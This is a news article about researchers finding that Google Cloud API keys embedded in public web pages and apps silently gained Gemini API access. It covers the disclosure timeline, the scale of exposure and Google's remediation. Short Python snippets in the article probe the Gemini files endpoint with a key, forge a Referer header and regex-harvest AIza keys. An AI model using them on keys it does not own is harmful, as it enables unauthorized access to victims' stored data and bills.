Researchers at TruffleSecurity published findings showing that Google Cloud API keys - credentials Google has explicitly told developers are safe to embed in public code for years - can now silently authenticate with the Gemini AI API, exposing uploaded files, cached data, and billable AI resources to anyone who finds them. The disclosure, published on February 25-26, 2026, followed a 90-day coordinated disclosure process during which Google initially dismissed the report before eventually acknowledging it and beginning remediation.
The research reached a wide audience quickly. Security researcher John Hammond, whose YouTube channel has 2.12 million subscribers, covered the findings on the same day, drawing more than 82,000 views within 72 hours. The core message landed simply: what was documented as safe to share is no longer safe, and almost nobody noticed the change.
The problem is not that developers made a mistake. It is that Google changed the rules without telling anyone.
What Google's own documentation said
To understand the exposure, it helps to start with what Google instructed developers to do. The Maps JavaScript API documentation directs developers to create an API key and then embed its alphanumeric string directly in the HTML of a web page. The relevant code sample places the key inside a <script> tag loaded from maps.googleapis.com - visible in any browser's page source. Google's documentation states: "Remember to restrict the API key before using it in production," but the default key created through the Google Cloud console is set to unrestricted, meaning it is immediately valid for every enabled API in the project.
The Firebase security checklist, last updated February 26, 2026 - the same day as the public disclosure - states under the heading "Understand API keys": "API keys for Firebase services are not secret. Firebase uses API keys only to identify your app's Firebase project to Firebase services, and not to control access to database or Cloud Storage data." The checklist instructs developers that they "can safely embed them in client code."
Those instructions were accurate when written. Google Cloud API keys were designed as project identifiers for billing, not as authentication credentials in the traditional sense. A Maps key sitting in public JavaScript posed no meaningful security risk under the old architecture. Then Gemini arrived. As TruffleSecurity's blog post, published February 25, 2026, put it: "No warning. No confirmation dialog. No email notification."
How the privilege escalation works
When a developer enables the Gemini API - formally listed as the Generative Language API - on a Google Cloud project, every existing API key associated with that project silently gains the ability to authenticate with Gemini endpoints. The key itself does not change. Its alphanumeric string, beginning with AIza, remains identical. What changes is what Google's backend accepts it for.
According to TruffleSecurity, this creates two distinct problems. The first is retroactive privilege expansion: a Maps key created three years ago, embedded in a website's source code exactly as Google instructed, becomes a Gemini credential the moment a developer on the same team enables the Gemini API for an internal prototype. The second is insecure defaults: a newly created Google Cloud API key defaults to "Unrestricted," making it immediately valid for every enabled API in the project, including Gemini.
The attack requires minimal skill. An attacker visits a website, opens the browser's developer tools, copies the AIza key from the Maps embed, and runs a single curl command against the Gemini API's /files endpoint. According to TruffleSecurity, instead of a 403 Forbidden response, the attacker receives a 200 OK. From there, the attacker can access any files or cached content the project owner has stored through the Gemini API, exhaust quotas to shut down legitimate services, or run up AI inference charges. "Depending on the model and context window, a threat actor maxing out API calls could generate thousands of dollars in charges per day on a single victim account," according to TruffleSecurity.
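The curl-and-200-OK probe TruffleSecurity describes can be sketched in a few lines of Python. The endpoint path follows the public Gemini API convention of passing the key as a `key` query parameter; the function names are illustrative, and the probe should never be run against keys you do not own.

```python
import urllib.request
import urllib.error

# Public Gemini API files-listing endpoint; the key travels as a query parameter.
GEMINI_FILES_URL = "https://generativelanguage.googleapis.com/v1beta/files"

def build_probe_url(api_key: str) -> str:
    """Construct the /files listing URL for a candidate key."""
    return f"{GEMINI_FILES_URL}?key={api_key}"

def key_has_gemini_access(api_key: str) -> bool:
    """Probe the Gemini Files endpoint with the key.

    Returns True on HTTP 200 (the key authenticates), False on an HTTP
    error such as 403 or 400. This performs a live network request.
    """
    try:
        with urllib.request.urlopen(build_probe_url(api_key)) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False
```

A 200 OK from this probe is exactly the signal the researchers describe: the key, created for Maps or Firebase, is accepted as a Gemini credential.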
A commenter on John Hammond's YouTube video cited a Reddit post describing "$82,000 in 48 hours from a stolen Gemini API key," posted by a developer whose normal monthly usage was $180. The researchers note that an attacker never needs to touch the target's infrastructure - the key is included in the public webpage, right where Google's documentation said to put it.
The vulnerability maps to two weakness categories: CWE-1188 (Initialization of a Resource with an Insecure Default) and CWE-269 (Improper Privilege Management). A developer creating a key for a map widget is unknowingly generating a credential capable of accessing sensitive AI endpoints, because the default configuration permits access to every enabled API in the project.
A separate concern raised during community discussion is that application-level "site restrictions" on these keys can be bypassed by adjusting the HTTP referrer header on a request - a limitation reportedly raised with Google in 2024 and closed without a fix.
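The reason referrer-based restrictions can reportedly be sidestepped is that the Referer header is entirely client-controlled. A minimal sketch, with an illustrative function name and URLs:

```python
import urllib.request

def forged_referrer_request(url: str, allowed_site: str) -> urllib.request.Request:
    """Build a request presenting an attacker-chosen Referer header.

    Site restrictions that trust this header are checking a value the
    client supplies, so an attacker can simply claim an allowed origin.
    """
    return urllib.request.Request(url, headers={"Referer": allowed_site})
```

Nothing in the HTTP layer prevents a non-browser client from setting this header to whatever value the key's restriction list permits.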
The scale: 2,863 live keys in a single crawl
To measure the scope of exposure, TruffleSecurity scanned the November 2025 Common Crawl dataset - a publicly available archive of approximately 700 terabytes of web content covering 2.29 billion pages. The scan returned 2,863 live Google API keys vulnerable to this privilege escalation vector.
These were not hobby projects. According to TruffleSecurity, victims included major financial institutions, security companies, global recruiting firms, and - notably - Google itself. The researchers provided Google with concrete examples from its own infrastructure during the disclosure process. One key had been embedded in the page source of a Google product's public-facing website since at least February 2023, confirmed through the Internet Archive. There was no client-side logic on the page attempting to access any generative AI endpoints - it was used solely as a public project identifier, standard practice for Google services. TruffleSecurity tested the key by hitting the Gemini API's /models endpoint and received a 200 OK response listing available models. A key deployed years ago for a completely benign purpose had silently gained full access to a sensitive API without any developer intervention.
The mobile application surface is larger still. Quokka, a mobile security firm, published a complementary report on February 27, 2026. A scan of 250,000 apps in Quokka's database found that 39.5 percent contained hardcoded Google API keys, returning more than 35,000 unique keys in total. Android applications can be decompiled using freely available open-source tools, and extracting a hardcoded key from decompiled code requires little more than a regular expression pattern match followed by a single API call.
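The extraction step amounts to a pattern match. The regex below uses the widely cited shape of Google Cloud API keys - the literal prefix AIza followed by 35 URL-safe characters - as a heuristic; it is not an official key specification.

```python
import re

# Commonly cited shape of Google Cloud API keys: "AIza" plus 35 URL-safe
# characters (39 characters total). Treat as a heuristic, not a spec.
GOOGLE_KEY_RE = re.compile(r"AIza[0-9A-Za-z_\-]{35}")

def extract_candidate_keys(text: str) -> set[str]:
    """Return unique key-shaped strings found in text, e.g. decompiled
    Android source or a downloaded web page."""
    return set(GOOGLE_KEY_RE.findall(text))
```

Running a pattern like this over decompiled APK output is all the "tooling" an attacker needs before moving to the single API call that confirms whether a candidate is live.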
A difficult disclosure
The path from discovery to public acknowledgment was not straightforward. TruffleSecurity submitted the report to Google's Vulnerability Disclosure Program on November 21, 2025. Four days later, Google determined the behavior was "intended" and dismissed the report.
The researchers pushed back. On December 1, 2025, after providing concrete examples from Google's own infrastructure - including keys on Google product websites - the issue gained internal traction. The following day, December 2, Google reclassified the report from "Customer Issue" to "Bug," upgraded its severity, and confirmed the product team was evaluating a fix. Google requested the full list of 2,863 exposed keys, which TruffleSecurity provided.
By December 12, 2025, Google had shared a remediation plan: it confirmed an internal pipeline to discover leaked keys, began restricting exposed keys from accessing the Gemini API, and committed to addressing the root cause before the public disclosure date. On January 13, 2026, Google formally classified the vulnerability as "Single-Service Privilege Escalation, READ" - Tier 1. On February 2, 2026, Google confirmed the team was still working on the root-cause fix. The 90-day disclosure window ended on February 19, 2026. Public disclosure followed on February 25-26.
TruffleSecurity was measured in its assessment of Google's response: "Building software at Google's scale is extraordinarily difficult, and the Gemini API inherited a key management architecture built for a different era. Google recognized the problem we reported and took meaningful steps." The researchers noted that getting the report initially taken seriously required demonstrating that Google's own infrastructure was affected - a detail John Hammond described in his video: "We provided Google with concrete examples from their own infrastructure. I'm not poking fun, but this is kind of a cool way to really demonstrate impact."
TruffleHog: scanning for the exposure
TruffleSecurity is the company behind TruffleHog, an open-source credential scanning tool released under an AGPL-3.0 license. As of the disclosure date, the GitHub repository had accumulated more than 24,800 stars, over 2,200 forks, 183 contributors, and 322 releases. The tool classifies over 800 secret types and supports active verification - it attempts to authenticate using discovered credentials to confirm whether they are live, returning one of three statuses: verified, unverified, or unknown.
TruffleHog can scan Git repositories, GitHub organizations, GitLab instances, Docker images, S3 buckets, Google Cloud Storage, Elasticsearch clusters, Postman workspaces, Jenkins servers, Confluence, Jira, Slack, filesystems, and more. For this specific exposure, TruffleSecurity recommends running:
trufflehog filesystem /path/to/your/code --only-verified
This scans local code for live, verified Google API keys and confirms whether any have Gemini access. The tool integrates into CI/CD pipelines via GitHub Actions and GitLab CI, and supports a pre-commit hook that prevents credentials from being committed in the first place. Joe Leon, the TruffleSecurity researcher who led the investigation, also published a 15-minute webinar explaining the technical details. The repository's go.mod and go.sum files were updated to Google API version v0.259.0 approximately one week before the public disclosure - a sign of active maintenance in the period surrounding this research.
TruffleHog's verification step is what distinguishes it from simple pattern-matching scanners. Rather than flagging any string that resembles an AIza key, it tests each key against the Gemini API to confirm whether it can authenticate - producing a list of live, exposed credentials rather than a list of candidates that may or may not be active.
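That pattern-match-then-verify flow can be sketched as a simple partition over a verification callback. This mirrors the idea, not TruffleHog's actual implementation; `partition_keys` and `is_live` are illustrative names, and injecting the callback lets the live check be stubbed out without network access.

```python
from typing import Callable, Iterable

def partition_keys(candidates: Iterable[str],
                   is_live: Callable[[str], bool]) -> tuple[list[str], list[str]]:
    """Split candidate keys into (verified, unverified).

    is_live is the verification step -- in practice an HTTP probe of the
    target API that reports whether the credential authenticates.
    """
    verified: list[str] = []
    unverified: list[str] = []
    for key in candidates:
        (verified if is_live(key) else unverified).append(key)
    return verified, unverified
```

The value of the second step is precision: the output is a list of credentials known to authenticate right now, not a pile of strings that merely look like keys.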
Why marketing and advertising teams are affected
The exposure has direct implications for marketing and advertising technology organizations, which have built deep integrations with the exact Google services at the center of this issue. Teams using Google Maps to display store locations, Firebase for app analytics and A/B testing, or YouTube for video embeds followed integration documentation that explicitly treated API keys as non-sensitive. If any of those Google Cloud projects subsequently had the Gemini API enabled - by a developer testing an AI feature, exploring an integration, or following a product tutorial - the keys already deployed in production client-side code may now carry Gemini access that nobody authorized.
Google's $425.7 million privacy verdict in September 2025, in which a jury found that the Firebase SDK continued collecting user data after users disabled tracking, demonstrated that credential and SDK architecture decisions carry legal and financial weight far beyond technical departments. According to trial testimony in that case, the Firebase SDK is deployed in approximately 97 percent of the top thousand Android applications - the same SDK ecosystem that now intersects with the Gemini API key exposure.
Google's real-time bidding practices faced a formal FTC complaint in January 2025 alleging exposure of sensitive data to foreign adversaries, with the complaint noting Google's RTB system operates across 35.4 million websites and 91 percent of Android apps. The API key vulnerability sits within the same broader pattern of credential infrastructure questions that have shadowed Google's expanding platform reach.
The Gemini API operates at substantial and growing scale. Alphabet reported in February 2026 that Gemini processes over 10 billion tokens per minute via direct API use, with the Gemini App reaching 750 million monthly active users. Google's advertising infrastructure now relies on Gemini across fraud detection, campaign optimization, image generation, and search products - meaning the pool of Google Cloud projects with the Generative Language API enabled, and therefore the number of legacy API keys that have quietly gained elevated permissions, is large and still growing.
Quokka frames the structural challenge plainly: "As AI capabilities get bolted onto existing platforms at speed, legacy credential architectures are being asked to do jobs they were never designed for. Keys that were safe under one set of platform capabilities become sensitive under another, and the gap between a platform's security posture and developers' understanding of it can widen faster than anyone notices."
What Google says it has changed
Google outlined three remediation commitments in its public statement. New keys created through AI Studio will default to Gemini-only scope, preventing the cross-service access that created the original exposure. Leaked keys discovered in the wild will be blocked from accessing the Gemini API. And Google plans to send proactive notifications to developers when exposed keys are detected.
TruffleSecurity described these as "meaningful improvements" while noting open questions remain - in particular, whether Google will retroactively audit all existing impacted keys and notify project owners who may be unknowingly exposed. "Honestly, that is a monumental task," the researchers acknowledged.
Notably, the Firebase security checklist updated on the day of public disclosure still states that API keys for Firebase services "are not secret" and that developers "can safely embed them in client code." It does not yet contain a caveat for projects with Gemini enabled. The Maps JavaScript API documentation, last updated February 27, 2026, does not reference the Gemini access risk. The documentation that led to the exposure remains largely unchanged.
Timeline
- February 2023 - A Google product's public-facing website embeds an API key in accessible page source. The key remains publicly visible for approximately three years.
- November 2025 - TruffleSecurity scans the November 2025 Common Crawl dataset (~700 TB, 2.29 billion pages) and identifies 2,863 live vulnerable Google API keys.
- November 21, 2025 - TruffleSecurity submits the report to Google's Vulnerability Disclosure Program.
- November 25, 2025 - Google initially determines the behavior is "intended" and dismisses the report. TruffleSecurity pushes back.
- December 1, 2025 - After TruffleSecurity provides examples from Google's own infrastructure, the issue gains internal traction.
- December 2, 2025 - Google reclassifies the report from "Customer Issue" to "Bug," upgrades severity, and requests the full list of 2,863 exposed keys. Gemini was by then deployed across Google's advertising fraud detection systems.
- December 12, 2025 - Google shares its remediation plan, confirms internal pipeline for leaked key detection, and commits to address root cause before disclosure.
- January 13, 2026 - Google classifies the vulnerability as "Single-Service Privilege Escalation, READ" - Tier 1.
- February 2, 2026 - Google confirms the root-cause fix is still in progress.
- February 19, 2026 - TruffleSecurity's 90-day disclosure window ends.
- February 25, 2026 - TruffleSecurity publishes its full blog post: "Google API Keys Weren't Secrets. But then Gemini Changed the Rules."
- February 26, 2026 - BleepingComputer publishes coverage. John Hammond's YouTube video reaches 82,000+ views within 72 hours. Firebase security checklist updated - same day as disclosure. Google's Gemini App had reached 750 million monthly active users by this date.
- February 27, 2026 - Quokka publishes mobile findings: 39.5 percent of 250,000 scanned apps contain hardcoded Google API keys, totaling more than 35,000 unique keys. The Maps JavaScript API documentation receives its most recent update, still without reference to the Gemini access risk.
Summary
Who: TruffleSecurity researcher Joe Leon discovered and disclosed the vulnerability after scanning public web data. John Hammond amplified the findings to a broad technical audience. Quokka published complementary mobile research. Google is the platform whose credential architecture created the exposure. Affected organizations span financial institutions, security companies, recruiting firms, and Google itself.
What: Google Cloud API keys - beginning with AIza, long documented as safe to embed in public client-side code - can now authenticate with the Gemini AI API when the Generative Language API is enabled on the associated Google Cloud project. TruffleSecurity found 2,863 live vulnerable keys in a single public web crawl covering 2.29 billion pages. Quokka found more than 35,000 unique exposed keys across 250,000 mobile apps. An attacker needs only to copy a key from a webpage and run a single curl command to gain access.
When: TruffleSecurity notified Google on November 21, 2025. Google initially dismissed the report on November 25 before reclassifying it as a bug on December 2. Google formally classified the vulnerability on January 13, 2026. Public disclosure followed on February 25-26, 2026, after the 90-day window closed on February 19.
Where: Exposed keys appear in publicly accessible JavaScript on websites, in decompiled Android application packages available via app stores, and in public code repositories. The risk is global, affecting any Google Cloud project with the Generative Language API enabled whose API keys appear in client-side code.
Why: Google spent over a decade explicitly instructing developers to treat API keys as non-sensitive project identifiers safe for public embedding. When the Generative Language API was enabled on Google Cloud projects, existing keys silently gained access to Gemini endpoints with no notification to developers. The insecure default configuration - unrestricted keys valid for all enabled APIs - combined with retroactive privilege expansion created an exposure that neither developers nor the organizations using their code anticipated.